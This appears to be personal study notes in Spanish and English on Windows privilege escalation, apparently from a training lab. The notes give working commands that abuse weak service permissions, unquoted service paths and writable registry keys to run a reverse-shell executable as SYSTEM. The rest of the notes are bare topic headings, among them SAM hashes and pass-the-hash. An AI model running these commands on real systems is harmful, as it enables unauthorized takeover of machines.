MANUAL - Windows PrivEsc
Service Exploits - Insecure Service Permissions
accesschk.exe /accepteula -uwcqv user *
accesschk.exe /accepteula -uwcqv user daclsvc
sc qc daclsvc
sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
net start daclsvcLa herramienta accesschk.exe con el prefijo uwcqv valida que servicio tiene permisos RW con el usuario actual.
Service Exploits - Unquoted Service Path
sc qc unquotedsvc
accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
net start unquotedsvcBUILTIN\Users = Significa son todos los usuarios que el sistema operativo crea al instalar el sistema operativo, incluidas las cuentas locales (por ejemplo, invitado, ASP.NET o IUSR_hostname). También incluye todos los usuarios creados en el dominio.
Service Exploits - Weak Registry Permissions
sc qc regsvc
accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
net start regsvcNT AUTHORITY\INTERACTIVE = Significa todos los usuarios que han iniciado sesión.
Service Exploits - Insecure Service Executables
Registry - AutoRuns
Registry - AlwaysInstallElevated
El comando REQ QUERY debe responder algo asi: AlwaysInstallElevated REG_DWORD 0x1
Passwords - Registry
Passwords - Saved Creds
Passwords - Security Account Manager (SAM)
Pass In The HASH
Scheduled Tasks
Startup Apps
Última actualización